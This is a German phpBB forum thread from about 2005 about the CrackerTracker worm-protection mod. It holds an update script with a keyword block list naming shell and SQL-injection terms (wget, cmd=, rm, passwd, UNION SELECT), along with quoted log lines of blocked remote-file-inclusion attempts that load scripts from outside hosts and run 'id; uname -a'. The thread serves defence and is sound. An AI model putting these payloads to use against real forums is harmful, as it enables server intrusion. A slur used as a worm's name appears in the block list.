CBACK CrackerTracker Worm Protector

Neue Projekte und Anfragen, Teamarbeiten und Alpha/Beta Scripte jeder Art.
KEINE Supportanfragen zu bestehenden MODs!
Benutzeravatar
skittles
Beiträge: 820
Registriert: So 04.Apr, 2004 01:07
Wohnort: Wien

Beitrag von skittles »

Eine Frage zu dem Mod:

Macht es Sinn, die Code Teile auch in anderen Pages einzubauen?
also von anderen Mods meine ich!
[center]Populanten von transparenten Domizilen sollten
mit fester Materie keine transzendenten Bewegungen durchf?hren.
[/center]


Bild
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Sicher, wenn Du bedarf hast, diese extra zu schützen.
Nur sind die Hauptziele immer noch die viewtopic.php und viewforum.php.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
skittles
Beiträge: 820
Registriert: So 04.Apr, 2004 01:07
Wohnort: Wien

Beitrag von skittles »

naja der Einbau dauert 30 sekunden, also ich werds schon reintun!
Schaden wirds hoffentlich nicht! *gg*
[center]Populanten von transparenten Domizilen sollten
mit fester Materie keine transzendenten Bewegungen durchf?hren.
[/center]


Bild
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Nein, schaden wirds nicht.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

OK dieser da hat ausgedient. Die Revolution wartet hier:

http://www.community.cback.de/viewtopic ... 2544#32544


NEUE VERSION
modbo
Beiträge: 1344
Registriert: Mo 13.Dez, 2004 11:18
Kontaktdaten:

Beitrag von modbo »

Oha. Den hätte Hotschi mal lieber auch installiert ...
http://phpBB.hotschi.de/
hack by iranian haloo group hack by iranian
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Na Hotschi hat seit Ewigkeiten nichts mehr gemacht.
Und das Board ist noch ein phpBB 2.0.4.
War dan nur eine Frage der Zeit.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
skittles
Beiträge: 820
Registriert: So 04.Apr, 2004 01:07
Wohnort: Wien

Beitrag von skittles »

"Protected by" Logo unten im Forum.
HeHe! Hätte gar nicht gedacht, dass es diese kleine Logo welches eine Arbeit von nicht mal einer Stunde war, mal so weit bringen würde. *gggg*
[center]Populanten von transparenten Domizilen sollten
mit fester Materie keine transzendenten Bewegungen durchf?hren.
[/center]


Bild
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

HeHe! Hätte gar nicht gedacht, dass es diese kleine Logo welches eine Arbeit von nicht mal einer Stunde war, mal so weit bringen würde. *gggg*

Na klar, wenn Du schon mir en Button machst muss der ja auch benutzt werden ne :D
Benutzeravatar
skittles
Beiträge: 820
Registriert: So 04.Apr, 2004 01:07
Wohnort: Wien

Beitrag von skittles »

kannste dafür mal mein Board testen?
Mein Board
Hehe!
Nein scherz beiseite!
Ich hoffe, deine Aktion läuft noch etwas länger!
[center]Populanten von transparenten Domizilen sollten
mit fester Materie keine transzendenten Bewegungen durchf?hren.
[/center]


Bild
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

LOL nice try aber mein lokales board heißt phpbb2 oder orion oder krimskrams
helluvaguy
Beiträge: 128
Registriert: Di 06.Apr, 2004 20:22

Beitrag von helluvaguy »

Es ist sicherlich eine dumme Frage, aber trotzdem muß ich sie stellen.

Was bringt es mir, wenn ich diese Angaben aus der Logdatei habe? Ich weiß zwar nun zu welchen Zeiten diese Scripte meine Site "angreifen" (was inzwischen mir die ungewöhnlich hohe Zahl an Gästen erklärt). Aber was kann ich insbesondere mit der Angabe "Angriffsversuch" anfangen?
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Ggf. weitere Sicherheitsvorkehrungen treffen, z.B. Schutz per .htaccess.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
volker58
Beiträge: 724
Registriert: Mo 27.Dez, 2004 19:22
Wohnort: Annaberg-Buchholz
Kontaktdaten:

Beitrag von volker58 »

20.04.2005, 04:41 65.54.188.87 msnbot/1.0 (+http://search.msn.com/msnbot.htm) topic=Auszeichnungen%20in%20Form%20von%20Orden&link=http://dimension.saab-cars.de/viewtopic.php?t=139
warum hat er das geblockt? ist doch nur ein bot, oder seh ich da was falsch?
Gruss Volker

http://www.fuchsienfreunde.de
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

%20in
helluvaguy
Beiträge: 128
Registriert: Di 06.Apr, 2004 20:22

Beitrag von helluvaguy »

[quote="oxpus - 4.April 2005, 17:12";p="29401"]Ggf. weitere Sicherheitsvorkehrungen treffen, z.B. Schutz per .htaccess.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.[/quote] Oxpus, könntest Du das evtl etwas näher ausführen? Selbst wenn ich weiß, von welcher IP ein solcher Angriff kommt, kann ich doch immer noch keine Schlägertruppe losschicken. Welche Schlüsse kann ich daraus ziehen, wenn ich die Zeiten von Angriffen kenne?
easygo
Beiträge: 155
Registriert: Fr 22.Okt, 2004 13:20
Kontaktdaten:

Beitrag von easygo »

[quote="cback - Fr 22.Apr, 2005 17:57";p="29406"]
%20in
[/quote]

LOL ^^ das nenn ich PREVENTIV ;)
Diskutiere nie mit einem Idioten: Erst zieht er dich auf sein
Niveau runter und dort schl?gt er dich mit Erfahrung.
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

LOL ^^ das nenn ich PREVENTIV wink
Naja, das er natürlich in der URL sagt aha da hat der Benutzer was mit gesucht oder oha der Wurm macht nen SQL Injection geht leider ja nicht ;)
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

UPDATE

Das Komplettpaket wurde ebenfalls auf Version 2.0.1 aktualisiert in meiner Downloadsektion. Alle die den ExtremeEdition 2.0.0 installiert haben können sich mit einem kleinen Update gegen den "Nigga" Worm schützen der ein Loch in der phpBB Styleverwaltung im ACP ausnutzt. Das ACP wird auch vor angriffen geschützt.

Hier das UPdate von 2.0.0 auf 2.0.1:

Code: Alles auswählen

##############################################################
## MOD Title: Update CrackerTracker v2.0.0 to v2.0.1
## MOD Author: CBACK < sonny@cback.de > (Christian Knerr) http://www.community.cback.de
## MOD Description: This updates CrackerTracker Version (2.0.0) to 
##                  the newest V2.0.1 Version (CrackerTracker XTreme 
##                  Edition 2nd Release)
##############################################################
## For Security Purposes, Please Check: http://www.phpbb.com/mods/downloads/ for the
## latest version of this MOD. Downloading this MOD from other sites could cause malicious code
## to enter into your phpBB Forum. As such, phpBB will not offer support for MODs not offered
## in our MOD-Database, located at: http://www.phpbb.com/mods/downloads/
##############################################################
## Before Adding This MOD To Your Forum, You Should Back Up All Files Related To This MOD
##############################################################
#
#-----[ OPEN ]------------------------------------------
#

  common.php


#
#-----[ FIND ]------------------------------------------
#

$wormprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20');


#
#-----[ REPLACE WITH ]------------------------------------------
#

$wormprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20', 'nigga', 'fopen', 'fwrite', '$_REQUEST', '$_GET');



#
#-----[ FIND ]------------------------------------------
#

$cfilesize = count(file("ctrack.txt"));


#
#-----[ REPLACE WITH ]------------------------------------------
#

$cfilesize = count(file($phpbb_root_path . "ctrack.txt"));



#
#-----[ FIND ]------------------------------------------
#

      if ($cfilesize > 200)  // Maximum entry Number into the Log File
      {
        $clog = fopen("ctrack.txt", "a");


#
#-----[ REPLACE WITH ]------------------------------------------
#

      if ($cfilesize > 200)  // Maximum entry Number into the Log File
      {
        $clog = fopen($phpbb_root_path . "ctrack.txt", "a");


#
#-----[ FIND ]------------------------------------------
#

      else
      {
        $clog = fopen('ctrack.txt', 'a');


#
#-----[ REPLACE WITH ]------------------------------------------
#

      else
      {
        $clog = fopen($phpbb_root_path . 'ctrack.txt', 'a');


#
#-----[ SAVE/CLOSE ALL FILES ]------------------------------------------
#
# EoM
#
# This MOD was created with: CBACK MIRO ModEditor (http://www.community.cback.de)
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Vielen Dank!
Nun fühlt ich mich schon wieder ein Stück sicherer.
(Hab ja nur noch 4 Updates vor mir...)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
modbo
Beiträge: 1344
Registriert: Mo 13.Dez, 2004 11:18
Kontaktdaten:

Beitrag von modbo »

Der erste Wurm seit bestehen des Boards wurde erfolgreich geblockt :D

Code: Alles auswählen

04.05.2005, 16:58 67.108.84.113 Linux  pic_id=http://www.thecurse.pop.com.br/sh.jpg?&cmd=id;uname%20-a;w 
THX @cback !
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Herzlichen Glückwunsch :bofl:
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

CrackerTracker-Log hat geschrieben:/phpbb2/portal.php?page=http://qwqw.altervista.org/tool25.dat?&cmd=id
^2
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Bei Dir?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Gesperrt